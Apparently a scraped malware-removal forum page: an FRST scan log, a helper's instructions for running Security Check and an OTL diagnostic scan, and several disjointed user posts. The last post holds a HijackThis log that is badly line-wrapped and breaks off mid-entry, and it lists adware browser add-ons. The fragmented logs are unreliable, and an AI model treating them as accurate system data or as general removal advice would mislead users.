2014-04-17 01:34 - 2014-04-17 01:34 - 00000000 ____D () C:\Users\AIR\AppData\Local\{45961A9D-70DF-42D2-91D4-BDC752BD64B7}

==================== One Month Modified Files and Folders =======

2014-05-10 21:43 - 2014-05-10 21:43 - 00034457 _____ () C:\Users\AIR\Desktop\FRST.txt
2014-05-10 21:43 - 2014-05-10 21:43 - 00000000 ____D () C:\FRST
2014-05-10 21:42 - 2014-05-10 21:42 - 02065408 _____ (Farbar) C:\Users\AIR\Desktop\FRST64.exe
2014-05-10 21:42 - 2013-10-05 23:06 - 00000900 _____ () C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-879570740-1523932123-957937009-1000UA.job
2014-05-10 21:36 - 2014-05-10 14:44 - 00003642 _____ () C:\Windows\System32\Tasks\RegWrite
2014-05-10 21:28 - 2013-06-09 00:27 - 00000468 _____ () C:\Windows\Tasks\AliUpdater{B46EAC48-AA8C-4A67-A782-738077F2149F}.job
2014-05-10 21:27 - 2013-03-24 15:22 - 00000920 _____ () C:\Windows\Tasks\FacebookUpdateTaskUserS-1-5-21-879570740-1523932123-957937009-1000UA.job
2014-05-10 21:23 - 2013-02-13 15:48 - 00000536 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-05-10 21:20 - 2014-02-18 10:05 - 00000000 ____D () C:\Users\AIR\AppData\Roaming\TaobaoProtect
2014-05-10 21:03 - 2013-05-22 13:44 - 00000000 ____D () C:\Users\AIR\Desktop\Typed Works
2014-05-10 20:55 - 2013-03-10 09:40 - 00000526 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2014-05-10 20:49 - 2014-05-10 20:49 - 00025658 _____ () C:\Users\AIR\AppData\Local\recently-used.xbel
2014-05-10 20:49 - 2013-05-01 23:32 - 00000000 ____D () C:\Users\AIR\.gimp-2.8
2014-05-10 20:49 - 2013-02-20 20:38 - 00000000 ____D () C:\Users\AIR\Desktop\Kelvin
2014-05-10 20:46 - 2009-07-14 11:20 - 00000000 ____D () C:\Windows\tracing
2014-05-10 20:43 - 2014-03-22 08:06 - 00000000 ____D () C:\Users\AIR\AppData\Roaming\Dropbox
2014-05-10 20:35 - 2014-05-10 20:35 - 00058704 _____ () C:\Users\AIR\Desktop\ark.txt
2014-05-10 19:45 - 2014-05-10 19:45 - 00380416 _____ () C:\Users\AIR\Desktop\63r8jur5.exe
2014-05-10 19:41 - 2014-05-10 19:41 - 00009613 _____ () C:\Users\AIR\Desktop\attach.txt
2014-05-10 19:40 - 2014-05-10 19:41 - 00027894 _____ () C:\Users\AIR\Desktop\dds.txt
2014-05-10 19:38 - 2014-05-10 19:38 - 00688992 ____R (Swearware) C:\Users\AIR\Desktop\dds.scr
2014-05-10 19:37 - 2014-05-10 19:37 - 00017745 _____ () C:\Users\AIR\Desktop\hijackthis.log
2014-05-10 19:35 - 2014-05-10 19:35 - 00388608 _____ (Trend Micro Inc.) C:\Users\AIR\Desktop\HijackThis.exe
2014-05-10 19:24 - 2013-03-25 22:41 - 04170752 ___SH () C:\Users\AIR\Desktop\Thumbs.db
2014-05-10 18:42 - 2013-10-05 23:06 - 00000848 _____ () C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-879570740-1523932123-957937009-1000Core.job
2014-05-10 18:30 - 2014-05-10 18:30 - 08326064 _____ (McAfee, Inc.) C:\Users\AIR\Desktop\SecurityScan_Release.exe
2014-05-10 17:50 - 2013-04-09 07:21 - 00000000 ____D () C:\ProgramData\MFAData
2014-05-10 17:26 - 2014-05-10 17:26 - 02347384 _____ (ESET) C:\Users\AIR\Desktop\esetsmartinstaller_enu.exe
2014-05-10 17:26 - 2014-05-10 17:26 - 00000000 ____D () C:\Program Files (x86)\ESET
2014-05-10 17:24 - 2009-07-14 12:45 - 00024608 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-05-10 17:24 - 2009-07-14 12:45 - 00024608 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-05-10 17:20 - 2013-02-07 11:08 - 01334779 _____ () C:\Windows\WindowsUpdate.log
2014-05-10 17:18 - 2014-03-22 08:07 - 00000000 ___RD () C:\Users\AIR\Dropbox
2014-05-10 17:18 - 2013-04-13 16:18 - 00000000 ____D () C:\Program Files\SoftEther VPN Client
2014-05-10 17:18 - 2013-03-11 07:36 - 00000000 ____D () C:\Users\AIR\.gstreamer-0.10
2014-05-10 17:18 - 2013-03-11 07:32 - 00000000 ____D () C:\Users\AIR\AppData\Roaming\MotoCast
2014-05-10 17:17 - 2013-02-13 15:48 - 00000532 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-05-10 17:17 - 2011-07-19 08:58 - 00000000 ____D () C:\ProgramData\PDFC
2014-05-10 17:16 - 2014-05-07 03:22 - 00001624 _____ () C:\Windows\setupact.log
2014-05-10 17:16 - 2013-04-14 14:21 - 00065536 _____ () C:\Windows\system32\Ikeext.etl
2014-05-10 17:16 - 2009-07-14 13:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-05-10 17:06 - 2013-10-06 17:50 - 00000000 ____D () C:\AdwCleaner
2014-05-10 17:00 - 2014-05-10 17:00 - 01316991 _____ () C:\Users\AIR\Desktop\AdwCleaner.exe
2014-05-10 16:55 - 2014-05-10 16:27 - 00000000 ____D () C:\Users\AIR_2\AppData\Roaming\AVG2014
2014-05-10 16:55 - 2014-05-10 16:26 - 00000000 ___RD () C:\Users\AIR_2\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
2014-05-10 16:55 - 2014-05-10 16:26 - 00000000 ___RD () C:\Users\AIR_2\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance
2014-05-10 16:55 - 2014-05-10 16:26 - 00000000 ___RD () C:\Users\AIR_2\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories
2014-05-10 16:55 - 2014-05-10 16:26 - 00000000 ____D () C:\Users\AIR_2\AppData\Roaming\TaobaoProtect
2014-05-10 16:55 - 2014-05-10 16:26 - 00000000 ____D () C:\Users\AIR_2\AppData\Roaming\Motorola Mobility
2014-05-10 16:55 - 2014-05-10 16:26 - 00000000 ____D () C:\Users\AIR_2
2014-05-10 16:55 - 2014-02-16 22:47 - 00000000 ____D () C:\Program Files (x86)\iTunes
2014-05-10 16:55 - 2013-02-08 08:04 - 00000000 ___HD () C:\GrandeDevice
2014-05-10 16:55 - 2013-02-07 11:09 - 00000000 ____D () C:\Users\AIR
2014-05-10 16:55 - 2009-07-14 11:20 - 00000000 __RHD () C:\Users\Public\Libraries
2014-05-10 16:55 - 2009-07-14 11:20 - 00000000 ___HD () C:\Windows\system32\GroupPolicy
2014-05-10 16:55 - 2009-07-14 11:20 - 00000000 ____D () C:\Windows\registration
2014-05-10 16:55 - 2009-07-14 11:20 - 00000000 ____D () C:\Windows\AppCompat
2014-05-10 16:29 - 2014-05-10 16:29 - 00000000 ____D () C:\Users\AIR_2\AppData\Local\alipay
2014-05-10 16:29 - 2014-05-10 16:28 - 00000000 ____D () C:\Users\AIR_2\AppData\Local\Google
2014-05-10 16:29 - 2014-05-10 16:26 - 00002193 _____ () C:\Users\AIR_2\Desktop\Google Chrome.lnk
2014-05-10 16:28 - 2014-05-10 16:28 - 00125000 _____ () C:\Users\AIR_2\AppData\Local\GDIPFONTCACHEV1.DAT
2014-05-10 16:28 - 2014-05-10 16:28 - 00000000 ____D () C:\Users\AIR_2\AppData\Roaming\Google
2014-05-10 16:28 - 2014-05-10 16:28 - 00000000 ____D () C:\Users\AIR_2\AppData\Roaming\ATI
2014-05-10 16:28 - 2014-05-10 16:28 - 00000000 ____D () C:\Users\AIR_2\AppData\Local\ATI
2014-05-10 16:27 - 2014-05-10 16:27 - 00000000 __SHD () C:\Users\AIR_2\AppData\Local\EmieUserList
2014-05-10 16:27 - 2014-05-10 16:27 - 00000000 __SHD () C:\Users\AIR_2\AppData\Local\EmieSiteList
2014-05-10 16:27 - 2014-05-10 16:27 - 00000000 ____D () C:\Users\AIR_2\AppData\Roaming\Apple Computer
2014-05-10 16:27 - 2014-05-10 16:27 - 00000000 ____D () C:\Users\AIR_2\AppData\Local\PDFC
2014-05-10 16:27 - 2014-05-10 16:27 - 00000000 ____D () C:\Users\AIR_2\AppData\Local\Avg2014
2014-05-10 16:27 - 2014-05-10 16:27 - 00000000 ____D () C:\Users\AIR_2\AppData\Local\Adobe
2014-05-10 16:27 - 2014-05-10 16:26 - 00000000 ___RD () C:\Users\AIR_2\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools
2014-05-10 16:27 - 2014-05-10 16:26 - 00000000 ____D () C:\Users\AIR_2\AppData\Roaming\Adobe
2014-05-10 16:26 - 2014-05-10 16:26 - 00001327 _____ () C:\Users\AIR_2\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2014-05-10 16:26 - 2014-05-10 16:26 - 00000808 __RSH () C:\Users\AIR_2\ntuser.pol
2014-05-10 16:26 - 2014-05-10 16:26 - 00000020 ___SH () C:\Users\AIR_2\ntuser.ini
2014-05-10 16:25 - 2014-02-12 17:39 - 00178952 _____ () C:\Windows\PFRO.log
2014-05-10 16:22 - 2014-05-10 16:22 - 00000584 __RSH () C:\Users\AIR\ntuser.pol
2014-05-10 15:27 - 2013-03-24 15:22 - 00000898 _____ () C:\Windows\Tasks\FacebookUpdateTaskUserS-1-5-21-879570740-1523932123-957937009-1000Core.job
2014-05-10 01:26 - 2013-02-12 00:37 - 00000000 _____ () C:\sparkraw.log
2014-05-10 01:03 - 2013-02-20 20:19 - 00000000 ____D () C:\Users\AIR\AppData\Roaming\iFunbox_UserCache
2014-05-09 21:25 - 2014-05-09 21:25 - 00012272 _____ () C:\Users\AIR\Desktop\fiesta mc list.xlsx
2014-05-09 21:11 - 2014-05-09 21:11 - 00090643 _____ () C:\Users\AIR\Desktop\67th Anniversary Concert_Food & Beverage_Sample.xlsx
2014-05-09 11:27 - 2013-02-27 18:47 - 00000052 _____ () C:\Windows\SysWOW64\DOErrors.log
2014-05-09 11:26 - 2013-05-03 12:14 - 00000000 _____ () C:\Windows\system32\HP_ActiveX_Patch_NOT_DETECTED.txt
2014-05-09 03:53 - 2013-02-15 20:26 - 00000000 ____D () C:\Users\AIR\AppData\Local\Adobe
2014-05-08 21:09 - 2014-02-10 10:49 - 00021699 _____ () C:\Windows\itrushwPTA.log
2014-05-08 07:18 - 2013-02-13 15:48 - 00003532 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2014-05-08 07:18 - 2013-02-13 15:48 - 00003280 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2014-05-07 18:37 - 2013-10-05 23:06 - 00003870 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskUserS-1-5-21-879570740-1523932123-957937009-1000UA
2014-05-07 18:37 - 2013-10-05 23:06 - 00003474 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskUserS-1-5-21-879570740-1523932123-957937009-1000Core
2014-05-07 06:24 - 2014-05-07 06:24 - 00000000 __SHD () C:\Users\AIR\AppData\Local\EmieUserList
2014-05-07 06:24 - 2014-05-07 06:24 - 00000000 __SHD () C:\Users\AIR\AppData\Local\EmieSiteList
2014-05-07 03:59 - 2009-07-14 11:20 - 00000000 ____D () C:\Windows\rescache
2014-05-07 03:22 - 2014-05-07 03:22 - 00000000 _____ () C:\Windows\setuperr.log
2014-05-07 03:19 - 2014-05-07 03:19 - 00000000 ___SD () C:\Windows\system32\CompatTel
2014-05-07 03:19 - 2009-07-14 11:20 - 00000000 ____D () C:\Windows\SysWOW64\zh-HK
2014-05-07 03:19 - 2009-07-14 11:20 - 00000000 ____D () C:\Windows\system32\zh-HK
2014-05-07 03:19 - 2009-07-14 11:20 - 00000000 ____D () C:\Windows\PolicyDefinitions
2014-05-06 21:58 - 2013-03-01 08:35 - 00003174 _____ () C:\Windows\System32\Tasks\HPCeeScheduleForAIR
2014-05-06 21:58 - 2013-03-01 08:35 - 00000324 _____ () C:\Windows\Tasks\HPCeeScheduleForAIR.job
2014-05-06 00:16 - 2013-10-18 00:39 - 00000000 ____D () C:\Users\AIR\Documents\Outlook 檔案
2014-05-05 11:14 - 2013-02-07 10:28 - 00000000 ____D () C:\Users\AIR\Documents\Mom
2014-05-05 08:55 - 2013-09-05 18:04 - 00000000 ___RD () C:\Users\AIR\Desktop\Aug2013
2014-05-03 22:50 - 2014-02-18 10:05 - 00000000 ____D () C:\Users\AIR\AppData\Local\alipay
2014-05-03 15:42 - 2014-02-02 13:24 - 00000000 ____D () C:\Users\AIR\Desktop\JVC_Cam
2014-05-03 10:01 - 2014-04-28 00:22 - 00002031 _____ () C:\Users\AIR\Documents\movie.wlmp
2014-05-03 09:59 - 2014-05-03 09:59 - 00000000 ____D () C:\Users\AIR\AppData\Local\{3682DD9A-1555-459A-84C9-46FBA34C3AFF}
2014-05-02 19:45 - 2014-03-22 08:06 - 00000000 ____D () C:\Users\AIR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Dropbox
2014-05-02 19:45 - 2013-02-07 11:16 - 00000000 ___RD () C:\Users\AIR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
2014-05-02 19:30 - 2013-09-03 20:55 - 00000000 ____D () C:\Users\AIR\AppData\Roaming\vlc
2014-05-02 12:46 - 2014-05-02 12:46 - 00000000 ____D () C:\Users\AIR\AppData\Local\{E8E24688-FD0A-4605-81C2-280A86A79587}
2014-05-02 12:21 - 2011-07-19 08:28 - 00397026 _____ () C:\Windows\system32\prfh0404.dat
2014-05-02 12:21 - 2011-07-19 08:28 - 00132010 _____ () C:\Windows\system32\prfc0404.dat
2014-05-02 12:21 - 2009-07-14 13:13 - 01337534 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-05-01 07:51 - 2013-02-07 13:29 - 00000000 ____D () C:\Users\AIR\AppData\Roaming\Mozilla
2014-04-30 07:55 - 2014-01-20 15:07 - 00102400 _____ () C:\Users\AIR\Documents\13-14 小學.xls
2014-04-30 07:01 - 2013-03-10 09:40 - 00003464 _____ () C:\Windows\System32\Tasks\Adobe Flash Player Updater
2014-04-30 07:01 - 2013-02-12 01:14 - 00692400 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2014-04-30 07:01 - 2013-02-12 01:14 - 00070832 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2014-04-29 22:01 - 2014-05-07 14:31 - 23547904 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2014-04-29 21:40 - 2014-05-07 14:31 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2014-04-29 20:48 - 2014-05-07 14:31 - 17384448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2014-04-29 20:34 - 2014-05-07 14:31 - 02724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2014-04-29 18:42 - 2013-07-11 19:22 - 00000000 ____D () C:\Users\AIR\Desktop\ENGLISH SOCIETY
2014-04-28 21:38 - 2009-07-14 13:32 - 00000000 ____D () C:\Windows\system32\FxsTmp
2014-04-28 21:23 - 2014-04-28 21:23 - 07559143 _____ () C:\Users\AIR\Desktop\file_20140428.zip
2014-04-28 20:01 - 2013-04-13 12:43 - 00000000 ____D () C:\Users\AIR\AppData\Roaming\uTorrent
2014-04-27 15:29 - 2014-04-27 15:29 - 00000000 ____D () C:\Users\AIR\AppData\Local\{17D1600E-66DF-4C31-A70C-41C04C20BED3}
2014-04-26 12:01 - 2014-01-27 13:48 - 00004716 _____ () C:\Windows\System32\Tasks\Microsoft Office 15 Sync Maintenance for AIR-HP-AIR AIR-HP
2014-04-25 10:52 - 2014-04-25 00:16 - 00000000 ____D () C:\Users\AIR\AppData\OICE_15_974FA576_32C1D314_28A8
2014-04-25 08:34 - 2014-04-01 08:25 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG
2014-04-24 16:45 - 2014-04-24 16:45 - 00001120 _____ () C:\Users\AIR\Desktop\501 - 捷徑.lnk
2014-04-24 16:45 - 2013-11-01 19:18 - 00000000 ____D () C:\Users\AIR\Desktop\Moto_Cam
2014-04-23 23:07 - 2014-04-23 23:00 - 00000000 ____D () C:\Users\AIR\Desktop\Moto Photo
2014-04-22 20:52 - 2013-05-22 13:44 - 00000000 ____D () C:\Users\AIR\Desktop\Practice
2014-04-22 15:15 - 2013-02-07 10:24 - 00000000 ____D () C:\Users\AIR\Desktop\Literature
2014-04-21 09:08 - 2014-04-21 09:08 - 14813831 _____ () C:\Users\AIR\Desktop\Mom.xcf
2014-04-20 17:44 - 2014-04-20 17:44 - 07559143 _____ () C:\Users\AIR\Desktop\file_20140420.zip
2014-04-20 17:09 - 2014-04-20 17:09 - 00000000 ____D () C:\ProgramData\Avg_Update_0414b
2014-04-18 15:01 - 2014-04-18 15:01 - 00237336 _____ (AVG Technologies CZ, s.r.o.) C:\Windows\system32\Drivers\avgidsdrivera.sys
2014-04-17 02:16 - 2014-04-17 01:43 - 00000000 ____D () C:\FFOutput
2014-04-17 01:43 - 2014-04-17 01:42 - 00000000 ____D () C:\Users\AIR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\FormatFactory
2014-04-17 01:42 - 2014-04-17 01:42 - 00000000 ____D () C:\Program Files (x86)\FreeTime
2014-04-17 01:34 - 2014-04-17 01:34 - 00000000 ____D () C:\Users\AIR\AppData\Local\{45961A9D-70DF-42D2-91D4-BDC752BD64B7}
2014-04-17 01:34 - 2014-03-07 22:03 - 00000000 ____D () C:\Users\AIR\AppData\Local\Windows Live
2014-04-16 11:27 - 2013-02-08 12:27 - 00000000 ____D () C:\ProgramData\Microsoft Help
2014-04-16 11:22 - 2013-03-22 23:48 - 00000000 ____D () C:\Program Files\Microsoft Office 15
2014-04-15 09:26 - 2013-06-09 00:27 - 00003534 _____ () C:\Windows\System32\Tasks\AliUpdater{B46EAC48-AA8C-4A67-A782-738077F2149F}
2014-04-14 10:24 - 2014-05-06 23:42 - 00465408 _____ (Microsoft Corporation) C:\Windows\system32\aepdu.dll
2014-04-14 10:19 - 2014-05-06 23:42 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll

Some content of TEMP:
====================
C:\Users\AIR\AppData\Local\Temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmpxmebbh.dll
C:\Users\AIR\AppData\Local\Temp\jna3790035305267919286.dll
C:\Users\AIR\AppData\Local\Temp\RightsNetworkCoreSetup_11.exe
C:\Users\AIR\AppData\Local\Temp\RightsNetworkMediaPlugIn_Setup_11_13.exe
C:\Users\AIR\AppData\Local\Temp\sqlite-3.6.20-sqlitejdbc.dll


==================== Bamital & volsnap Check =================

C:\Windows\System32\winlogon.exe => MD5 is legit
C:\Windows\System32\wininit.exe => MD5 is legit
C:\Windows\SysWOW64\wininit.exe => MD5 is legit
C:\Windows\explorer.exe => MD5 is legit
C:\Windows\SysWOW64\explorer.exe => MD5 is legit
C:\Windows\System32\svchost.exe => MD5 is legit
C:\Windows\SysWOW64\svchost.exe => MD5 is legit
C:\Windows\System32\services.exe => MD5 is legit
C:\Windows\System32\User32.dll => MD5 is legit
C:\Windows\SysWOW64\User32.dll => MD5 is legit
C:\Windows\System32\userinit.exe => MD5 is legit
C:\Windows\SysWOW64\userinit.exe => MD5 is legit
C:\Windows\System32\rpcss.dll => MD5 is legit
C:\Windows\System32\Drivers\volsnap.sys => MD5 is legit


LastRegBack: 2014-05-09 13:30

==================== End Of Log ============================

Hiya

Sorry for the late reply, these forums are very busy :(

Are you still having this problem? If so, can you do the following for me:

Download Security Check from here.

• Save it to your Desktop.
• Double click SecurityCheck.exe and follow the onscreen instructions inside of the black box.
• A Notepad document should open automatically called checkup.txt; please post the contents of that document.

------

Download OTL to your Desktop


(Vista or Win 7 => right click and Run As Administrator)

• Double click on the icon to run it. Make sure all other windows are closed and to let it run uninterrupted.
• When the window appears, underneath Output at the top change it to Standard Output.
• At the top, check the box entitled Scan All Users
• Toward the bottom, check:
  All Users
  LOP Check
  Purity Check
• Under the Standard Registry box change it to All
  Do not change any settings unless otherwise told to do so.
• Please copy the text in the code box below and paste it in the Custom Scans/Fixes box in OTL:
  
  
  Code:

  ---

  DRIVES
netsvcs
activex
msconfig
drivers32
%systemroot%\assembly\GAC_32\*.ini
%systemroot%\assembly\GAC_64\*.ini
%ALLUSERSPROFILE%\Application Data\*.exe
%APPDATA%\*.
safebootminimal
safebootnetwork
%SYSTEMDRIVE%\*.*
%PROGRAMFILES%\*.exe
%LOCALAPPDATA%\*.exe
%windir%\Installer\*.*
%windir%\system32\tasks\*.*
%windir%\system32\tasks\*.* /64
%systemroot%\Fonts\*.exe
%systemroot%\*. /mp /s
/md5start
pnrpnsp.dll
nwprovau.dll
nlaapi.dll
napinsp.dll
mswsock.dll
winrnr.dll
wshelper.dll
consrv.dll
explorer.exe
winlogon.exe
regedit.exe
Userinit.exe
svchost.exe
services.exe
user32.dll
atapi.sys
csrss.exe
PRINTISOLATIONHOST.EXE
/md5stop
hklm\software\clients\startmenuinternet|command /rs
hklm\software\clients\startmenuinternet|command /64 /rs
%systemroot%\system32\*.dll /lockedfiles
%systemroot%\Tasks\*.job /lockedfiles
%systemdrive%\$Recycle.Bin|@;true;true;true /fp
%systemroot%\system32\drivers\*.sys /lockedfiles
C:\Windows\assembly\tmp\U\*.* /s
%Temp%\smtmp\* \s
%Temp%\smtmp\1\*.*
%Temp%\smtmp\2\*.*
%Temp%\smtmp\3\*.*
%Temp%\smtmp\4\*.*
dir "%systemdrive%\*" /S /A:L /C
CREATERESTOREPOINT

  ---

• Click the Run Scan button. The scan wont take long.
  A black box will appear, this is part of the custom scan, so don't be alarmed ;)
  IF OTL SAYS 'NOT RESPONDING' DON'T USE THE MOUSE. IT WILL CARRY ON SCANNING AFTER A FEW MINUTES
  
  
• When the scan completes, it will open two notepad windows. OTL.Txt and Extras.Txt. These are saved in the same location as OTL.
  
• Please copy (Edit->Select All, Edit->Copy) the contents of these files, one at a time and post them in your topic
  

Thanks

eddie

hey im new and haven serious problem with my computer the cpu is being used up by the nt kernel& system and the percentage of time the processor is idle i have tried checked for bad sectors in all my hard drives my graphic card i unplugged it i updated all my drivers restored my computer to windows seven wiped the data completely using disk part and its using most all my cpu i dont know what to do

specs are amd phenom 9650 quad core processor 4gb of ram nvidia quadro fx 3800 3 disk drives windows 7 sp1 i think thats all please help

Thanks for answering my question. I'm going to indicate that it has been solved since I will not be able to get to that PC until next October. I'll repost it then.

Ok thanks

Hi I have the same problem you seemed to have fixed for user FisherMoon back on 26 April 2012.
I have a virus that when in a web browser it creates hyperlinks and advertisements out of all my wed pages. Also when I open a new web page or click anywhere it loads a pop up advertisement of some kind.

I have tried to run the same fix in OTS that you prescribed for him but it doesn't seem to have worked. Could you please help me though this.

Also I should note that I'm not a IT person at all so my knowledge is very limited.

Thank you for your help.

Below are the files I think I'm suppose to send to you.

------------------

Logfile of Trend

Micro HijackThis

v2.0.4
Scan saved at

4:57:55 p.m., on

11/05/2014
Platform: Windows 7

SP1 (WinNT

6.00.3505)
MSIE: Internet

Explorer v11.0

(11.00.9600.17041)
Boot mode: Normal

Running processes:
C:\Windows

\SysWOW64\Rundll32.

exe
C:\Program Files

(x86)\Hewlett-

Packard\HP

ProtectTools

Security Manager

\Bin\DPAgent.exe
C:\Users

\adam.ransfield

\AppData\Roaming

\Spotify\Data

\SpotifyWebHelper.e

xe
C:\Users

\adam.ransfield

\AppData\Local

\FilesFrog Update

Checker

\update_checker.exe
C:\Program Files

(x86)\Skype\Phone

\Skype.exe
C:\Users

\adam.ransfield

\AppData\Local

\WebPlayer\FLV

Player

\WebPlayer.exe
C:\Program Files

(x86)\Renesas

Electronics\USB 3.0

Host Controller

Driver\Application

\nusb3mon.exe
C:\Program Files

(x86)\Adobe\Acrobat

9.0\Acrobat

\acrotray.exe
C:\Program Files

(x86)\Common Files

\Adobe\ARM

\1.0\AdobeARM.exe
C:\Program Files

(x86)\Sophos

\AutoUpdate

\ALMon.exe
C:\Program Files

(x86)\Cisco\Cisco

AnyConnect Secure

Mobility Client

\vpnui.exe
C:\Program Files

(x86)\Common Files

\Java\Java Update

\jusched.exe
C:\Program Files

(x86)\iTunes

\iTunesHelper.exe
C:\Program Files

(x86)\DivX\DivX

Update

\DivXUpdate.exe
C:\Program Files

(x86)\Hewlett-

Packard\Embedded

Security Software

\PSDrt.exe
C:\Program Files

(x86)\Google

\Chrome

\Application

\chrome.exe
C:\Program Files

(x86)\Google

\Chrome

\Application

\chrome.exe
C:\Program Files

(x86)\Google

\Chrome

\Application

\chrome.exe
C:\Program Files

(x86)\Google

\Chrome

\Application

\chrome.exe
C:\Program Files

(x86)\Google

\Chrome

\Application

\chrome.exe
C:\Program Files

(x86)\Google

\Chrome

\Application

\chrome.exe
C:\Program Files

(x86)\Google

\Chrome

\Application

\chrome.exe
C:\Program Files

(x86)\Google

\Chrome

\Application

\chrome.exe
C:\Program Files

(x86)\Google

\Chrome

\Application

\chrome.exe
C:\Program Files

(x86)\Google

\Chrome

\Application

\chrome.exe
C:\Program Files

(x86)\Google

\Chrome

\Application

\chrome.exe
C:\Program Files

(x86)\Google

\Chrome

\Application

\chrome.exe
C:\Users

\adam.ransfield

\Downloads

\HijackThis.exe

R1 - HKCU\Software

\Microsoft\Internet

Explorer

\Main,Search Page =

http://go.microsoft

.com/fwlink/?

LinkId=54896
R0 - HKCU\Software

\Microsoft\Internet

Explorer\Main,Start

Page =

https://mail.google

.com/mail/?

shva=1#inbox
R1 - HKLM\Software

\Microsoft\Internet

Explorer

\Main,Default_Page_

URL =

http://go.microsoft

.com/fwlink/p/?

LinkId=255141
R1 - HKLM\Software

\Microsoft\Internet

Explorer

\Main,Default_Searc

h_URL =

http://go.microsoft

.com/fwlink/?

LinkId=54896
R1 - HKLM\Software

\Microsoft\Internet

Explorer

\Main,Search Page =

http://go.microsoft

.com/fwlink/?

LinkId=54896
R0 - HKLM\Software

\Microsoft\Internet

Explorer\Main,Start

Page =

http://go.microsoft

.com/fwlink/p/?

LinkId=255141
R0 - HKLM\Software

\Microsoft\Internet

Explorer

\Search,SearchAssis

tant =
R0 - HKLM\Software

\Microsoft\Internet

Explorer

\Search,CustomizeSe

arch =
R0 - HKLM\Software

\Microsoft\Internet

Explorer\Main,Local

Page = C:\Windows

\SysWOW64\blank.htm
R1 - HKCU\Software

\Microsoft\Windows

\CurrentVersion

\Internet

Settings,ProxyOverr

ide = *.local
R0 - HKCU\Software

\Microsoft\Internet

Explorer

\Toolbar,LinksFolde

rName =
R3 - URLSearchHook:

Vuze Remote Toolbar

- {ba14329e-9550-

4989-b3f2-

9732e92d17cc} - C:

\Program Files

(x86)\Vuze_Remote

\prxtbVuze.dll
F2 -

REG:system.ini:

UserInit=userinit.e

xe
O2 - BHO:

CrossriderApp005246

6 - {11111111-1111

-1111-1111-

110511241166} - C:

\Program Files

(x86)\FLV Player

Addon\FLV Player

Addon-bho.dll
O2 - BHO:

AcroIEHelperStub -

{18DF081C-E8AD-

4283-A596-

FA578C2EBDC3} - C:

\Program Files

(x86)\Common Files

\Adobe\Acrobat

\ActiveX

\AcroIEHelperShim.d

ll
O2 - BHO: Groove

GFS Browser Helper

- {72853161-30C5-

4D22-B7F9-

0BBC1D38A37E} - C:

\PROGRA~2\MICROS~1\

Office14\GROOVEEX.D

LL
O2 - BHO: Java(tm)

Plug-In SSV Helper

- {761497BB-D6F0-

462C-B6EB-

D4DAF1D92D43} - C:

\Program Files

(x86)\Java

\jre7\bin\ssv.dll
O2 - BHO: Adobe PDF

Conversion Toolbar

Helper - {AE7CD045

-E861-484f-8273-

0445EE161910} - C:

\Program Files

(x86)\Common Files

\Adobe\Acrobat

\ActiveX

\AcroIEFavClient.dl

l
O2 - BHO:

SkypeIEPluginBHO -

{AE805869-2E5C-

4ED4-8F7B-

F1F7851A4497} - C:

\Program Files

(x86)\Skype

\Toolbars\Internet

Explorer

\SkypeIEPlugin.dll
O2 - BHO:

URLRedirectionBHO -

{B4F3A835-0E21-

4959-BA22-

42B3008E02FF} - C:

\PROGRA~2\MICROS~1\

Office14\URLREDIR.D

LL
O2 - BHO: Vuze

Remote -

{ba14329e-9550-

4989-b3f2-

9732e92d17cc} - C:

\Program Files

(x86)\Vuze_Remote

\prxtbVuze.dll
O2 - BHO: Java(tm)

Plug-In 2 SSV

Helper - {DBC80044

-A445-435b-BC74-

9C25C1C588A9} - C:

\Program Files

(x86)\Java

\jre7\bin

\jp2ssv.dll
O2 - BHO:

SmartSelect -

{F4971EE7-DAA0-

4053-9964-

665D8EE6A077} - C:

\Program Files

(x86)\Common Files

\Adobe\Acrobat

\ActiveX

\AcroIEFavClient.dl

l
O3 - Toolbar: Adobe

PDF - {47833539-

D0C5-4125-9FA8-

0819E2EAAC93} - C:

\Program Files

(x86)\Common Files

\Adobe\Acrobat

\ActiveX

\AcroIEFavClient.dl

l
O3 - Toolbar: Vuze

Remote Toolbar -

{ba14329e-9550-

4989-b3f2-

9732e92d17cc} - C:

\Program Files

(x86)\Vuze_Remote

\prxtbVuze.dll
O4 - HKLM\..\Run:

[IMSS] "C:\Program

Files (x86)\Intel

\Intel(R)

Management Engine

Components\IMSS

\PIconStartup.exe"
O4 - HKLM\..\Run:

[NUSB3MON] "c:

\Program Files

(x86)\Renesas

Electronics\USB 3.0

Host Controller

Driver\Application

\nusb3mon.exe"
O4 - HKLM\..\Run:

